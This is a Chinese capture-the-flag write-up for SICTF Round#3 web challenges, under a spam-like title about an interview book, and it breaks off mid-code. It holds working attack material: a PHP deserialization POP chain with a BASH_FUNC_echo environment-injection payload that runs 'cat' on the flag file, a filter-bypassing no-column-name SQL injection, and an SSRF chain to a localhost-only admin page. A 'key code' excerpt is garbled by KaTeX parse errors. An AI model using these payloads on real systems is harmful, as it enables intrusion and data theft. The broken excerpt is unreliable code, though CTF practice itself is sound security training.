SICTF Round#3（WEB方向，面试前必看的一本书书籍

源码如下：

<?php highlight\_file(\_\_FILE\_\_); class start { public $welcome; public $you; public function \_\_destruct() { $this->begin0fweb(); } public function begin0fweb() { $p='hacker!'; $this->welcome->you = $p; } } class SE{ public $year; public function \_\_set($name, $value){ echo ' Welcome to new year! '; echo($this->year); } } class CR { public $last; public $newyear; public function \_\_tostring() { if (is\_array($this->newyear)) { echo 'nonono'; return false; } if (!preg\_match('/worries/i',$this->newyear)) { echo "empty it!"; return 0; } if(preg\_match('/^.\*(worries).\*$/',$this->newyear)) { echo 'Don\'t be worry'; } else { echo 'Worries doesn\'t exists in the new year '; empty($this->last->worries); } return false; } } class ET{ public function \_\_isset($name) { foreach ($\_GET['get'] as $inject => $rce){ putenv("{$inject}={$rce}"); } system("echo \"Haven't you get the secret?\""); } } if(isset($\_REQUEST['go'])){ unserialize(base64\_decode($\_REQUEST['go'])); } ?>

POC：

<?php class start{ public $welcome; function \_\_construct(){ $this->welcome = new SE; } } class SE{ public $year; function \_\_construct(){ $this->year=new CR; } } class CR{ public $last; public $newyear = "\nworries"; function \_\_construct(){ $this->last = new ET; } } class ET{ } echo base64\_encode(serialize(new start)); ?>

关键代码：

public function __isset(KaTeX parse error: Expected '}', got 'EOF' at end of input: …me) { foreach (_GET[‘get’] as $inject => KaTeX parse error: Expected '}', got 'EOF' at end of input: rce){ putenv("{inject}={$rce}");
}
system(“echo “Haven’t you get the secret?””);
}

涉及环境变量注入，参考P神博客：环境变量注入
Payload：

?go=Tzo1OiJzdGFydCI6MTp7czo3OiJ3ZWxjb21lIjtPOjI6IlNFIjoxOntzOjQ6InllYXIiO086MjoiQ1IiOjI6e3M6NDoibGFzdCI7TzoyOiJFVCI6MDp7fXM6NzoibmV3eWVhciI7czo4OiIKd29ycmllcyI7fX19&get[BASH_FUNC_echo%25%25]=()%20{%20cat%20/ffffllllllaaaaaaaaaaaaaaaaaaggggg;%20}

3. hacker（无列名注入）

考点是SQL注入，过滤了information_schemta，考虑无列名注入。
Payload：

?username=1.1’//union//select//group_concat(2)//from//(select//1,2//union//select//*//from/**/flag)a%23

4. EZ_SSRF（SSRF）

<?php highlight\_file(__file__); error\_reporting(0); function get($url) { $curl = curl\_init(); curl\_setopt($curl, CURLOPT\_URL, $url); curl\_setopt($curl, CURLOPT\_HEADER, 0); curl\_setopt($curl, CURLOPT\_RETURNTRANSFER, true); $data = curl\_exec($curl); curl\_close($curl); echo base64\_encode($data); return $data; } class client{ public $url; public $payload; public function \_\_construct() { $url = "http://127.0.0.1/"; $payload = "system(\"cat /flag\");"; echo "Exploit"; } public function \_\_destruct() { get($this->url); } } // hint:hide other file if(isset($\_GET['Harder'])) { unserialize($\_GET['Harder']); } else { echo "You don't know how to pass parameters?"; } ?>

回显型SSRF，直接包含/flag没有内容。根据hint:hide other file，扫描了一波目录，还存在admin.php和flag.php，admin.php内容如下：

<?php error\_reporting(0); include "flag.php"; highlight\_file(\_\_FILE\_\_); $allowed\_ip = "127.0.0.1"; if ($\_SERVER['REMOTE\_ADDR'] !== $allowed\_ip) { die("You can't get flag"); } else { echo $flag; } ?>

可以得知，当$_SERVER['REMOTE_ADDR']的值等于127.0.0.1时，就输出flag，但是$_SERVER['REMOTE_ADDR']是不可伪造的。此时我们可以借助SSRF，将目标靶机作为跳板机，访问/admin.php文件。
POC：

<?php class client{ public $url = "http://127.0.0.1/admin.php"; } echo serialize(new client); ?>

成功获取到flag。

5. Oyst3rPHP（md5、preg_match、TP6反序列化POP）

根据favicon.io得知是ThinkPHP，先拿TP漏扫工具一把梭，无果。扫描目录发现存在www.zip文件。
拿到app\controller\Index.php文件内容：

<?php namespace app\controller; use app\BaseController; class Index extends BaseController { public function index(){ echo "RT，一个很简单的Web，给大家送一点分,再送三只生蚝，过年一起吃生蚝哈"; echo "